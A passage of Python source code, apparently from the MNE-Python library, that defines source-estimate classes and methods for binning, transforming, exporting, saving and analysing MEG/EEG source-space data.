where the data attribute is set\n to abs(self.data).\n \"\"\"\n stc = self.copy()\n stc._remove_kernel_sens_data_()\n stc._data = abs(stc._data)\n return stc\n\n def sqrt(self):\n \"\"\"Take the square root.\n\n Returns\n -------\n stc : instance of SourceEstimate\n A copy of the 
SourceEstimate with sqrt(data).\n \"\"\"\n return self ** (0.5)\n\n def copy(self):\n \"\"\"Return copy of source estimate instance.\n\n Returns\n -------\n stc : instance of SourceEstimate\n A copy of the source estimate.\n \"\"\"\n return copy.deepcopy(self)\n\n def bin(self, width, tstart=None, tstop=None, func=np.mean):\n \"\"\"Return a source estimate object with data summarized over time bins.\n\n Time bins of ``width`` seconds. This method is intended for\n visualization only. No filter is applied to the data before binning,\n making the method inappropriate as a tool for downsampling data.\n\n Parameters\n ----------\n width : scalar\n Width of the individual bins in seconds.\n tstart : scalar | None\n Time point where the first bin starts. The default is the first\n time point of the stc.\n tstop : scalar | None\n Last possible time point contained in a bin (if the last bin would\n be shorter than width it is dropped). The default is the last time\n point of the stc.\n func : callable\n Function that is applied to summarize the data. 
Needs to accept a\n numpy.array as first input and an ``axis`` keyword argument.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The binned source estimate.\n \"\"\"\n if tstart is None:\n tstart = self.tmin\n if tstop is None:\n tstop = self.times[-1]\n\n times = np.arange(tstart, tstop + self.tstep, width)\n nt = len(times) - 1\n data = np.empty(self.shape[:-1] + (nt,), dtype=self.data.dtype)\n for i in range(nt):\n idx = (self.times >= times[i]) & (self.times < times[i + 1])\n data[..., i] = func(self.data[..., idx], axis=-1)\n\n tmin = times[0] + width / 2.\n stc = self.copy()\n stc._data = data\n stc.tmin = tmin\n stc.tstep = width\n return stc\n\n def transform_data(self, func, idx=None, tmin_idx=None, tmax_idx=None):\n \"\"\"Get data after a linear (time) transform has been applied.\n\n The transform is applied to each source time course independently.\n\n Parameters\n ----------\n func : callable\n The transform to be applied, including parameters (see, e.g.,\n :func:`functools.partial`). The first parameter of the function is\n the input data. The first return value is the transformed data,\n remaining outputs are ignored. The first dimension of the\n transformed data has to be the same as the first dimension of the\n input data.\n idx : array | None\n Indicices of source time courses for which to compute transform.\n If None, all time courses are used.\n tmin_idx : int | None\n Index of first time point to include. If None, the index of the\n first time point is used.\n tmax_idx : int | None\n Index of the first time point not to include. 
If None, time points\n up to (and including) the last time point are included.\n\n Returns\n -------\n data_t : ndarray\n The transformed data.\n\n Notes\n -----\n Applying transforms can be significantly faster if the\n SourceEstimate object was created using \"(kernel, sens_data)\", for\n the \"data\" parameter as the transform is applied in sensor space.\n Inverse methods, e.g., \"apply_inverse_epochs\", or \"apply_lcmv_epochs\"\n do this automatically (if possible).\n \"\"\"\n if idx is None:\n # use all time courses by default\n idx = slice(None, None)\n\n if self._kernel is None and self._sens_data is None:\n if self._kernel_removed:\n warn_('Performance can be improved by not accessing the data '\n 'attribute before calling this method.')\n\n # transform source space data directly\n data_t = func(self.data[idx, ..., tmin_idx:tmax_idx])\n\n if isinstance(data_t, tuple):\n # use only first return value\n data_t = data_t[0]\n else:\n # apply transform in sensor space\n sens_data_t = func(self._sens_data[:, tmin_idx:tmax_idx])\n\n if isinstance(sens_data_t, tuple):\n # use only first return value\n sens_data_t = sens_data_t[0]\n\n # apply inverse\n data_shape = sens_data_t.shape\n if len(data_shape) > 2:\n # flatten the last dimensions\n sens_data_t = sens_data_t.reshape(data_shape[0],\n np.prod(data_shape[1:]))\n\n data_t = np.dot(self._kernel[idx, :], sens_data_t)\n\n # restore original shape if necessary\n if len(data_shape) > 2:\n data_t = data_t.reshape(data_t.shape[0], *data_shape[1:])\n\n return data_t\n\n def transform(self, func, idx=None, tmin=None, tmax=None, copy=False):\n \"\"\"Apply linear transform.\n\n The transform is applied to each source time course independently.\n\n Parameters\n ----------\n func : callable\n The transform to be applied, including parameters (see, e.g.,\n :func:`functools.partial`). The first parameter of the function is\n the input data. 
The first two dimensions of the transformed data\n should be (i) vertices and (ii) time. See Notes for details.\n idx : array | None\n Indices of source time courses for which to compute transform.\n If None, all time courses are used.\n tmin : float | int | None\n First time point to include (ms). If None, self.tmin is used.\n tmax : float | int | None\n Last time point to include (ms). If None, self.tmax is used.\n copy : bool\n If True, return a new instance of SourceEstimate instead of\n modifying the input inplace.\n\n Returns\n -------\n stcs : SourceEstimate | VectorSourceEstimate | list\n The transformed stc or, in the case of transforms which yield\n N-dimensional output (where N > 2), a list of stcs. For a list,\n copy must be True.\n\n Notes\n -----\n Transforms which yield 3D\n output (e.g. time-frequency transforms) are valid, so long as the\n first two dimensions are vertices and time. In this case, the\n copy parameter must be True and a list of\n SourceEstimates, rather than a single instance of SourceEstimate,\n will be returned, one for each index of the 3rd dimension of the\n transformed data. In the case of transforms yielding 2D output\n (e.g. filtering), the user has the option of modifying the input\n inplace (copy = False) or returning a new instance of\n SourceEstimate (copy = True) with the transformed data.\n\n Applying transforms can be significantly faster if the\n SourceEstimate object was created using \"(kernel, sens_data)\", for\n the \"data\" parameter as the transform is applied in sensor space.\n Inverse methods, e.g., \"apply_inverse_epochs\", or \"apply_lcmv_epochs\"\n do this automatically (if possible).\n \"\"\"\n # min and max data indices to include\n times = 1000. 
* self.times\n t_idx = np.where(_time_mask(times, tmin, tmax, sfreq=self.sfreq))[0]\n if tmin is None:\n tmin_idx = None\n else:\n tmin_idx = t_idx[0]\n\n if tmax is None:\n tmax_idx = None\n else:\n # +1, because upper boundary needs to include the last sample\n tmax_idx = t_idx[-1] + 1\n\n data_t = self.transform_data(func, idx=idx, tmin_idx=tmin_idx,\n tmax_idx=tmax_idx)\n\n # account for change in n_vertices\n if idx is not None:\n idx_lh = idx[idx < len(self.lh_vertno)]\n idx_rh = idx[idx >= len(self.lh_vertno)] - len(self.lh_vertno)\n verts_lh = self.lh_vertno[idx_lh]\n verts_rh = self.rh_vertno[idx_rh]\n else:\n verts_lh = self.lh_vertno\n verts_rh = self.rh_vertno\n verts = [verts_lh, verts_rh]\n\n tmin_idx = 0 if tmin_idx is None else tmin_idx\n tmin = self.times[tmin_idx]\n\n if data_t.ndim > 2:\n # return list of stcs if transformed data has dimensionality > 2\n if copy:\n stcs = [SourceEstimate(data_t[:, :, a], verts, tmin,\n self.tstep, self.subject)\n for a in range(data_t.shape[-1])]\n else:\n raise ValueError('copy must be True if transformed data has '\n 'more than 2 dimensions')\n else:\n # return new or overwritten stc\n stcs = self if not copy else self.copy()\n stcs.vertices = verts\n stcs.data = data_t\n stcs.tmin = tmin\n\n return stcs\n\n @fill_doc\n def to_data_frame(self, index=None, scaling_time=None, scalings=None,\n long_format=False, time_format='ms'):\n \"\"\"Export data in tabular structure as a pandas DataFrame.\n\n Vertices are converted to columns in the DataFrame. By default,\n an additional column \"time\" is added, unless ``index='time'``\n (in which case time values form the DataFrame's index).\n\n Parameters\n ----------\n %(df_index_evk)s\n Defaults to ``None``.\n %(df_scaling_time_deprecated)s\n %(df_scalings)s\n %(df_longform_stc)s\n %(df_time_format)s\n\n .. 
versionadded:: 0.20\n\n Returns\n -------\n %(df_return)s\n \"\"\"\n # check deprecation\n _check_scaling_time(scaling_time)\n # check pandas once here, instead of in each private utils function\n pd = _check_pandas_installed() # noqa\n # arg checking\n valid_index_args = ['time', 'subject']\n valid_time_formats = ['ms', 'timedelta']\n index = _check_pandas_index_arguments(index, valid_index_args)\n time_format = _check_time_format(time_format, valid_time_formats)\n # get data\n data = self.data.T\n times = self.times\n # prepare extra columns / multiindex\n mindex = list()\n default_index = ['time']\n if self.subject is not None:\n default_index = ['subject', 'time']\n mindex.append(('subject', np.repeat(self.subject, data.shape[0])))\n times = _convert_times(self, times, time_format)\n mindex.append(('time', times))\n # triage surface vs volume source estimates\n if isinstance(self.vertices, list):\n col_names = list()\n for ii, vertno in enumerate(self.vertices):\n col_names.extend(['{}_{}'.format(('LH', 'RH')[ii], vert)\n for vert in vertno])\n else:\n col_names = ['VOL_{}'.format(vert) for vert in self.vertices]\n # build DataFrame\n df = _build_data_frame(self, data, None, long_format, mindex, index,\n default_index=default_index,\n col_names=col_names, col_kind='source')\n return df\n\n\ndef _center_of_mass(vertices, values, hemi, surf, subject, subjects_dir,\n restrict_vertices):\n \"\"\"Find the center of mass on a surface.\"\"\"\n if (values == 0).all() or (values < 0).any():\n raise ValueError('All values must be non-negative and at least one '\n 'must be non-zero, cannot compute COM')\n subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)\n surf = read_surface(op.join(subjects_dir, subject, 'surf',\n hemi + '.' 
+ surf))\n if restrict_vertices is True:\n restrict_vertices = vertices\n elif restrict_vertices is False:\n restrict_vertices = np.arange(surf[0].shape[0])\n elif isinstance(restrict_vertices, SourceSpaces):\n idx = 1 if restrict_vertices.kind == 'surface' and hemi == 'rh' else 0\n restrict_vertices = restrict_vertices[idx]['vertno']\n else:\n restrict_vertices = np.array(restrict_vertices, int)\n pos = surf[0][vertices, :].T\n c_o_m = np.sum(pos * values, axis=1) / np.sum(values)\n vertex = np.argmin(np.sqrt(np.mean((surf[0][restrict_vertices, :] -\n c_o_m) ** 2, axis=1)))\n vertex = restrict_vertices[vertex]\n return vertex\n\n\n@fill_doc\nclass _BaseSurfaceSourceEstimate(_BaseSourceEstimate):\n \"\"\"Abstract base class for surface source estimates.\n\n Parameters\n ----------\n data : array\n The data in source space.\n vertices : list of array, shape (2,)\n Vertex numbers corresponding to the data. The first element of the list\n contains vertices of left hemisphere and the second element contains\n vertices of right hemisphere.\n tmin : scalar\n Time point of the first sample in data.\n tstep : scalar\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n vertices : list of array, shape (2,)\n Vertex numbers corresponding to the data. The first element of the list\n contains vertices of left hemisphere and the second element contains\n vertices of right hemisphere.\n data : array\n The data in source space.\n shape : tuple\n The shape of the data. 
A tuple of int (n_dipoles, n_times).\n \"\"\"\n\n _data_ndim = 2\n _src_type = 'surface'\n\n @verbose\n def __init__(self, data, vertices=None, tmin=None, tstep=None,\n subject=None, verbose=None): # noqa: D102\n\n if not (isinstance(vertices, list) and len(vertices) == 2):\n raise ValueError('Vertices must be a list containing two '\n 'numpy arrays, got type %s (%s)'\n % (type(vertices), vertices))\n\n _BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,\n tstep=tstep, subject=subject,\n verbose=verbose)\n\n @property\n def lh_data(self):\n \"\"\"Left hemisphere data.\"\"\"\n return self.data[:len(self.lh_vertno)]\n\n @property\n def rh_data(self):\n \"\"\"Right hemisphere data.\"\"\"\n return self.data[len(self.lh_vertno):]\n\n @property\n def lh_vertno(self):\n \"\"\"Left hemisphere vertno.\"\"\"\n return self.vertices[0]\n\n @property\n def rh_vertno(self):\n \"\"\"Right hemisphere vertno.\"\"\"\n return self.vertices[1]\n\n def _hemilabel_stc(self, label):\n if label.hemi == 'lh':\n stc_vertices = self.vertices[0]\n else:\n stc_vertices = self.vertices[1]\n\n # find index of the Label's vertices\n idx = np.nonzero(np.in1d(stc_vertices, label.vertices))[0]\n\n # find output vertices\n vertices = stc_vertices[idx]\n\n # find data\n if label.hemi == 'rh':\n values = self.data[idx + len(self.vertices[0])]\n else:\n values = self.data[idx]\n\n return vertices, values\n\n def in_label(self, label):\n \"\"\"Get a source estimate object restricted to a label.\n\n SourceEstimate contains the time course of\n activation of all sources inside the label.\n\n Parameters\n ----------\n label : Label | BiHemiLabel\n The label (as created for example by mne.read_label). 
If the label\n does not match any sources in the SourceEstimate, a ValueError is\n raised.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The source estimate restricted to the given label.\n \"\"\"\n # make sure label and stc are compatible\n if label.subject is not None and self.subject is not None \\\n and label.subject != self.subject:\n raise RuntimeError('label and stc must have same subject names, '\n 'currently \"%s\" and \"%s\"' % (label.subject,\n self.subject))\n\n if label.hemi == 'both':\n lh_vert, lh_val = self._hemilabel_stc(label.lh)\n rh_vert, rh_val = self._hemilabel_stc(label.rh)\n vertices = [lh_vert, rh_vert]\n values = np.vstack((lh_val, rh_val))\n elif label.hemi == 'lh':\n lh_vert, values = self._hemilabel_stc(label)\n vertices = [lh_vert, np.array([], int)]\n elif label.hemi == 'rh':\n rh_vert, values = self._hemilabel_stc(label)\n vertices = [np.array([], int), rh_vert]\n else:\n raise TypeError(\"Expected Label or BiHemiLabel; got %r\" % label)\n\n if sum([len(v) for v in vertices]) == 0:\n raise ValueError('No vertices match the label in the stc file')\n\n label_stc = self.__class__(values, vertices=vertices, tmin=self.tmin,\n tstep=self.tstep, subject=self.subject)\n return label_stc\n\n def expand(self, vertices):\n \"\"\"Expand SourceEstimate to include more vertices.\n\n This will add rows to stc.data (zero-filled) and modify stc.vertices\n to include all vertices in stc.vertices and the input vertices.\n\n Parameters\n ----------\n vertices : list of array\n New vertices to add. 
Can also contain old values.\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The modified stc (note: method operates inplace).\n \"\"\"\n if not isinstance(vertices, list):\n raise TypeError('vertices must be a list')\n if not len(self.vertices) == len(vertices):\n raise ValueError('vertices must have the same length as '\n 'stc.vertices')\n\n # can no longer use kernel and sensor data\n self._remove_kernel_sens_data_()\n\n inserters = list()\n offsets = [0]\n for vi, (v_old, v_new) in enumerate(zip(self.vertices, vertices)):\n v_new = np.setdiff1d(v_new, v_old)\n inds = np.searchsorted(v_old, v_new)\n # newer numpy might overwrite inds after np.insert, copy here\n inserters += [inds.copy()]\n offsets += [len(v_old)]\n self.vertices[vi] = np.insert(v_old, inds, v_new)\n inds = [ii + offset for ii, offset in zip(inserters, offsets[:-1])]\n inds = np.concatenate(inds)\n new_data = np.zeros((len(inds),) + self.data.shape[1:])\n self.data = np.insert(self.data, inds, new_data, axis=0)\n return self\n\n @verbose\n def to_original_src(self, src_orig, subject_orig=None,\n subjects_dir=None, verbose=None):\n \"\"\"Get a source estimate from morphed source to the original subject.\n\n Parameters\n ----------\n src_orig : instance of SourceSpaces\n The original source spaces that were morphed to the current\n subject.\n subject_orig : str | None\n The original subject. For most source spaces this shouldn't need\n to be provided, since it is stored in the source space itself.\n %(subjects_dir)s\n %(verbose_meth)s\n\n Returns\n -------\n stc : SourceEstimate | VectorSourceEstimate\n The transformed source estimate.\n\n See Also\n --------\n morph_source_spaces\n\n Notes\n -----\n .. 
versionadded:: 0.10.0\n \"\"\"\n if self.subject is None:\n raise ValueError('stc.subject must be set')\n src_orig = _ensure_src(src_orig, kind='surface')\n subject_orig = _ensure_src_subject(src_orig, subject_orig)\n data_idx, vertices = _get_morph_src_reordering(\n self.vertices, src_orig, subject_orig, self.subject, subjects_dir)\n return self.__class__(self._data[data_idx], vertices,\n self.tmin, self.tstep, subject_orig)\n\n\n@fill_doc\nclass SourceEstimate(_BaseSurfaceSourceEstimate):\n \"\"\"Container for surface source estimates.\n\n Parameters\n ----------\n data : array of shape (n_dipoles, n_times) | tuple, shape (2,)\n The data in source space. When it is a single array, the\n left hemisphere is stored in data[:len(vertices[0])] and the right\n hemisphere is stored in data[-len(vertices[1]):].\n When data is a tuple, it contains two arrays:\n\n - \"kernel\" shape (n_vertices, n_sensors) and\n - \"sens_data\" shape (n_sensors, n_times).\n\n In this case, the source space data corresponds to\n ``np.dot(kernel, sens_data)``.\n vertices : list of array, shape (2,)\n Vertex numbers corresponding to the data. The first element of the list\n contains vertices of left hemisphere and the second element contains\n vertices of right hemisphere.\n tmin : scalar\n Time point of the first sample in data.\n tstep : scalar\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n vertices : list of array, shape (2,)\n The indices of the dipoles in the left and right source space.\n data : array of shape (n_dipoles, n_times)\n The data in source space.\n shape : tuple\n The shape of the data. 
A tuple of int (n_dipoles, n_times).\n\n See Also\n --------\n VectorSourceEstimate : A container for vector source estimates.\n VolSourceEstimate : A container for volume source estimates.\n MixedSourceEstimate : A container for mixed surface + volume source\n estimates.\n \"\"\"\n\n @verbose\n def save(self, fname, ftype='stc', verbose=None):\n \"\"\"Save the source estimates to a file.\n\n Parameters\n ----------\n fname : str\n The stem of the file name. The file names used for surface source\n spaces are obtained by adding \"-lh.stc\" and \"-rh.stc\" (or \"-lh.w\"\n and \"-rh.w\") to the stem provided, for the left and the right\n hemisphere, respectively.\n ftype : str\n File format to use. Allowed values are \"stc\" (default), \"w\",\n and \"h5\". The \"w\" format only supports a single time point.\n %(verbose_meth)s\n \"\"\"\n _validate_type(fname, 'path-like', 'fname')\n fname = str(fname)\n _check_option('ftype', ftype, ['stc', 'w', 'h5'])\n\n lh_data = self.data[:len(self.lh_vertno)]\n rh_data = self.data[-len(self.rh_vertno):]\n\n if ftype == 'stc':\n logger.info('Writing STC to disk...')\n _write_stc(fname + '-lh.stc', tmin=self.tmin, tstep=self.tstep,\n vertices=self.lh_vertno, data=lh_data)\n _write_stc(fname + '-rh.stc', tmin=self.tmin, tstep=self.tstep,\n vertices=self.rh_vertno, data=rh_data)\n\n elif ftype == 'w':\n if self.shape[1] != 1:\n raise ValueError('w files can only contain a single time '\n 'point')\n logger.info('Writing STC to disk (w format)...')\n _write_w(fname + '-lh.w', vertices=self.lh_vertno,\n data=lh_data[:, 0])\n _write_w(fname + '-rh.w', vertices=self.rh_vertno,\n data=rh_data[:, 0])\n\n elif ftype == 'h5':\n super().save(fname)\n logger.info('[done]')\n\n @copy_function_doc_to_method_doc(plot_source_estimates)\n def plot(self, subject=None, surface='inflated', hemi='lh',\n colormap='auto', time_label='auto', smoothing_steps=10,\n transparent=True, alpha=1.0, time_viewer='auto',\n subjects_dir=None,\n figure=None, 
views='lat', colorbar=True, clim='auto',\n cortex=\"classic\", size=800, background=\"black\",\n foreground=\"white\", initial_time=None, time_unit='s',\n backend='auto', spacing='oct6', title=None,\n show_traces='auto', verbose=None):\n brain = plot_source_estimates(\n self, subject, surface=surface, hemi=hemi, colormap=colormap,\n time_label=time_label, smoothing_steps=smoothing_steps,\n transparent=transparent, alpha=alpha, time_viewer=time_viewer,\n subjects_dir=subjects_dir, figure=figure, views=views,\n colorbar=colorbar, clim=clim, cortex=cortex, size=size,\n background=background, foreground=foreground,\n initial_time=initial_time, time_unit=time_unit, backend=backend,\n spacing=spacing, title=title, show_traces=show_traces,\n verbose=verbose)\n return brain\n\n @verbose\n def extract_label_time_course(self, labels, src, mode='mean_flip',\n allow_empty=False, verbose=None):\n \"\"\"Extract label time courses for lists of labels.\n\n This function will extract one time course for each label. The way the\n time courses are extracted depends on the mode parameter.\n\n Parameters\n ----------\n %(eltc_labels)s\n %(eltc_src)s\n %(eltc_mode)s\n %(eltc_allow_empty)s\n %(verbose_meth)s\n\n Returns\n -------\n label_tc : array, shape=(n_labels, n_times)\n Extracted time course for each label.\n\n See Also\n --------\n extract_label_time_course : Extract time courses for multiple STCs.\n\n Notes\n -----\n %(eltc_mode_notes)s\n \"\"\"\n label_tc = extract_label_time_course(\n self, labels, src, mode=mode, return_generator=False,\n allow_empty=allow_empty, verbose=verbose)\n\n return label_tc\n\n @verbose\n def estimate_snr(self, info, fwd, cov, verbose=None):\n r\"\"\"Compute time-varying SNR in the source space.\n\n This function should only be used with source estimates with units\n nanoAmperes (i.e., MNE-like solutions, *not* dSPM or sLORETA).\n\n .. 
warning:: This function currently only works properly for fixed\n orientation.\n\n Parameters\n ----------\n info : instance Info\n The measurement info.\n fwd : instance of Forward\n The forward solution used to create the source estimate.\n cov : instance of Covariance\n The noise covariance used to estimate the resting cortical\n activations. Should be an evoked covariance, not empty room.\n %(verbose)s\n\n Returns\n -------\n snr_stc : instance of SourceEstimate\n The source estimate with the SNR computed.\n\n Notes\n -----\n We define the SNR in decibels for each source location at each\n time point as:\n\n .. math::\n\n {\\rm SNR} = 10\\log_10[\\frac{a^2}{N}\\sum_k\\frac{b_k^2}{s_k^2}]\n\n where :math:`\\\\b_k` is the signal on sensor :math:`k` provided by the\n forward model for a source with unit amplitude, :math:`a` is the\n source amplitude, :math:`N` is the number of sensors, and\n :math:`s_k^2` is the noise variance on sensor :math:`k`.\n\n References\n ----------\n .. [1] Goldenholz, D. M., Ahlfors, S. P., Hämäläinen, M. S., Sharon,\n D., Ishitobi, M., Vaina, L. M., & Stufflebeam, S. M. (2009).\n Mapping the Signal-To-Noise-Ratios of Cortical Sources in\n Magnetoencephalography and Electroencephalography.\n Human Brain Mapping, 30(4), 1077–1086. 
doi:10.1002/hbm.20571\n \"\"\"\n from .forward import convert_forward_solution, Forward\n from .minimum_norm.inverse import _prepare_forward\n _validate_type(fwd, Forward, 'fwd')\n _validate_type(info, Info, 'info')\n _validate_type(cov, Covariance, 'cov')\n _check_stc_units(self)\n if (self.data >= 0).all():\n warn_('This STC appears to be from free orientation, currently SNR'\n ' function is valid only for fixed orientation')\n\n fwd = convert_forward_solution(fwd, surf_ori=True, force_fixed=False)\n\n # G is gain matrix [ch x src], cov is noise covariance [ch x ch]\n G, _, _, _, _, _, _, cov, _ = _prepare_forward(\n fwd, info, cov, fixed=True, loose=0, rank=None, pca=False,\n use_cps=True, exp=None, limit_depth_chs=False, combine_xyz='fro',\n allow_fixed_depth=False, limit=None)\n G = G['sol']['data']\n n_channels = cov['dim'] # number of sensors/channels\n b_k2 = (G * G).T\n s_k2 = np.diag(cov['data'])\n scaling = (1 / n_channels) * np.sum(b_k2 / s_k2, axis=1, keepdims=True)\n snr_stc = self.copy()\n snr_stc._data[:] = 10 * np.log10((self.data * self.data) * scaling)\n return snr_stc\n\n def get_peak(self, hemi=None, tmin=None, tmax=None, mode='abs',\n vert_as_index=False, time_as_index=False):\n \"\"\"Get location and latency of peak amplitude.\n\n Parameters\n ----------\n hemi : {'lh', 'rh', None}\n The hemi to be considered. If None, the entire source space is\n considered.\n tmin : float | None\n The minimum point in time to be considered for peak getting.\n tmax : float | None\n The maximum point in time to be considered for peak getting.\n mode : {'pos', 'neg', 'abs'}\n How to deal with the sign of the data. If 'pos' only positive\n values will be considered. If 'neg' only negative values will\n be considered. 
If 'abs' absolute values will be considered.\n Defaults to 'abs'.\n vert_as_index : bool\n Whether to return the vertex index instead of of its ID.\n Defaults to False.\n time_as_index : bool\n Whether to return the time index instead of the latency.\n Defaults to False.\n\n Returns\n -------\n pos : int\n The vertex exhibiting the maximum response, either ID or index.\n latency : float | int\n The time point of the maximum response, either latency in seconds\n or index.\n \"\"\"\n data = {'lh': self.lh_data, 'rh': self.rh_data, None: self.data}[hemi]\n vertno = {'lh': self.lh_vertno, 'rh': self.rh_vertno,\n None: np.concatenate(self.vertices)}[hemi]\n\n vert_idx, time_idx, _ = _get_peak(data, self.times, tmin, tmax, mode)\n\n return (vert_idx if vert_as_index else vertno[vert_idx],\n time_idx if time_as_index else self.times[time_idx])\n\n @fill_doc\n def center_of_mass(self, subject=None, hemi=None, restrict_vertices=False,\n subjects_dir=None, surf='sphere'):\n \"\"\"Compute the center of mass of activity.\n\n This function computes the spatial center of mass on the surface\n as well as the temporal center of mass as in [1]_.\n\n .. note:: All activity must occur in a single hemisphere, otherwise\n an error is raised. The \"mass\" of each point in space for\n computing the spatial center of mass is computed by summing\n across time, and vice-versa for each point in time in\n computing the temporal center of mass. This is useful for\n quantifying spatio-temporal cluster locations, especially\n when combined with :func:`mne.vertex_to_mni`.\n\n Parameters\n ----------\n subject : str | None\n The subject the stc is defined for.\n hemi : int, or None\n Calculate the center of mass for the left (0) or right (1)\n hemisphere. 
If None, one of the hemispheres must be all zeroes,\n and the center of mass will be calculated for the other\n hemisphere (useful for getting COM for clusters).\n restrict_vertices : bool | array of int | instance of SourceSpaces\n If True, returned vertex will be one from stc. Otherwise, it could\n be any vertex from surf. If an array of int, the returned vertex\n will come from that array. If instance of SourceSpaces (as of\n 0.13), the returned vertex will be from the given source space.\n For most accuruate estimates, do not restrict vertices.\n %(subjects_dir)s\n surf : str\n The surface to use for Euclidean distance center of mass\n finding. The default here is \"sphere\", which finds the center\n of mass on the spherical surface to help avoid potential issues\n with cortical folding.\n\n Returns\n -------\n vertex : int\n Vertex of the spatial center of mass for the inferred hemisphere,\n with each vertex weighted by the sum of the stc across time. For a\n boolean stc, then, this would be weighted purely by the duration\n each vertex was active.\n hemi : int\n Hemisphere the vertex was taken from.\n t : float\n Time of the temporal center of mass (weighted by the sum across\n source vertices).\n\n See Also\n --------\n mne.Label.center_of_mass\n mne.vertex_to_mni\n\n References\n ----------\n .. 
[1] Larson and Lee, \"The cortical dynamics underlying effective\n switching of auditory spatial attention\", NeuroImage 2012.\n \"\"\"\n if not isinstance(surf, str):\n raise TypeError('surf must be a string, got %s' % (type(surf),))\n subject = _check_subject(self.subject, subject)\n if np.any(self.data < 0):\n raise ValueError('Cannot compute COM with negative values')\n values = np.sum(self.data, axis=1) # sum across time\n vert_inds = [np.arange(len(self.vertices[0])),\n np.arange(len(self.vertices[1])) + len(self.vertices[0])]\n if hemi is None:\n hemi = np.where(np.array([np.sum(values[vi])\n for vi in vert_inds]))[0]\n if not len(hemi) == 1:\n raise ValueError('Could not infer hemisphere')\n hemi = hemi[0]\n _check_option('hemi', hemi, [0, 1])\n vertices = self.vertices[hemi]\n values = values[vert_inds[hemi]] # left or right\n del vert_inds\n vertex = _center_of_mass(\n vertices, values, hemi=['lh', 'rh'][hemi], surf=surf,\n subject=subject, subjects_dir=subjects_dir,\n restrict_vertices=restrict_vertices)\n # do time center of mass by using the values across space\n masses = np.sum(self.data, axis=0).astype(float)\n t_ind = np.sum(masses * np.arange(self.shape[1])) / np.sum(masses)\n t = self.tmin + self.tstep * t_ind\n return vertex, hemi, t\n\n\nclass _BaseVectorSourceEstimate(_BaseSourceEstimate):\n _data_ndim = 3\n\n @verbose\n def __init__(self, data, vertices=None, tmin=None, tstep=None,\n subject=None, verbose=None): # noqa: D102\n assert hasattr(self, '_scalar_class')\n super().__init__(data, vertices, tmin, tstep, subject, verbose)\n if self._data is not None and self._data.shape[1] != 3:\n raise ValueError('Data for VectorSourceEstimate must have second '\n 'dimension of length 3, got length %s'\n % (self._data.shape[1],))\n\n def magnitude(self):\n \"\"\"Compute magnitude of activity without directionality.\n\n Returns\n -------\n stc : instance of SourceEstimate\n The source estimate without directionality information.\n \"\"\"\n data_mag = 
np.linalg.norm(self.data, axis=1)\n return self._scalar_class(\n data_mag, self.vertices, self.tmin, self.tstep, self.subject,\n self.verbose)\n\n @fill_doc\n def normal(self, src, use_cps=True):\n \"\"\"Compute activity orthogonal to the cortex.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space for which this source estimate is specified.\n %(use_cps)s\n Should be the same value that was used when the forward model\n was computed (typically True).\n\n .. versionadded:: 0.20\n\n Returns\n -------\n stc : instance of SourceEstimate\n The source estimate only retaining the activity orthogonal to the\n cortex.\n \"\"\"\n _check_src_normal('normal', src)\n normals = np.vstack([_get_src_nn(s, use_cps, v) for s, v in\n zip(src, self._vertices_list)])\n data_norm = einsum('ijk,ij->ik', self.data, normals)\n return self._scalar_class(\n data_norm, self.vertices, self.tmin, self.tstep, self.subject,\n self.verbose)\n\n\nclass _BaseVolSourceEstimate(_BaseSourceEstimate):\n\n _data_ndim = 2\n _src_type = 'volume'\n\n @verbose\n def __init__(self, data, vertices=None, tmin=None, tstep=None,\n subject=None, verbose=None): # noqa: D102\n _validate_type(vertices, (np.ndarray, list), 'vertices')\n _BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,\n tstep=tstep, subject=subject,\n verbose=verbose)\n\n @property\n def _vertices_list(self):\n return [self.vertices]\n\n @copy_function_doc_to_method_doc(plot_volume_source_estimates)\n def plot(self, src, subject=None, subjects_dir=None, mode='stat_map',\n bg_img=None, colorbar=True, colormap='auto', clim='auto',\n transparent='auto', show=True, initial_time=None,\n initial_pos=None, verbose=None):\n data = self.magnitude() if self._data_ndim == 3 else self\n return plot_volume_source_estimates(\n data, src=src, subject=subject, subjects_dir=subjects_dir,\n mode=mode, bg_img=bg_img, colorbar=colorbar, colormap=colormap,\n clim=clim, transparent=transparent, show=show,\n 
initial_time=initial_time, initial_pos=initial_pos,\n verbose=verbose)\n\n def save_as_volume(self, fname, src, dest='mri', mri_resolution=False,\n format='nifti1'):\n \"\"\"Save a volume source estimate in a NIfTI file.\n\n Parameters\n ----------\n fname : str\n The name of the generated nifti file.\n src : list\n The list of source spaces (should all be of type volume).\n dest : 'mri' | 'surf'\n If 'mri' the volume is defined in the coordinate system of\n the original T1 image. If 'surf' the coordinate system\n of the FreeSurfer surface is used (Surface RAS).\n mri_resolution : bool\n It True the image is saved in MRI resolution.\n\n .. warning:: If you have many time points, the file produced can be\n huge.\n format : str\n Either 'nifti1' (default) or 'nifti2'.\n\n .. versionadded:: 0.17\n\n Returns\n -------\n img : instance Nifti1Image\n The image object.\n\n Notes\n -----\n .. versionadded:: 0.9.0\n \"\"\"\n import nibabel as nib\n _validate_type(fname, 'path-like', 'fname')\n fname = str(fname)\n img = self.as_volume(src, dest=dest, mri_resolution=mri_resolution,\n format=format)\n nib.save(img, fname)\n\n def as_volume(self, src, dest='mri', mri_resolution=False,\n format='nifti1'):\n \"\"\"Export volume source estimate as a nifti object.\n\n Parameters\n ----------\n src : list\n The list of source spaces (should all be of type volume).\n dest : 'mri' | 'surf'\n If 'mri' the volume is defined in the coordinate system of\n the original T1 image. If 'surf' the coordinate system\n of the FreeSurfer surface is used (Surface RAS).\n mri_resolution : bool\n It True the image is saved in MRI resolution.\n\n .. warning:: If you have many time points, the file produced can be\n huge.\n format : str\n Either 'nifti1' (default) or 'nifti2'.\n\n Returns\n 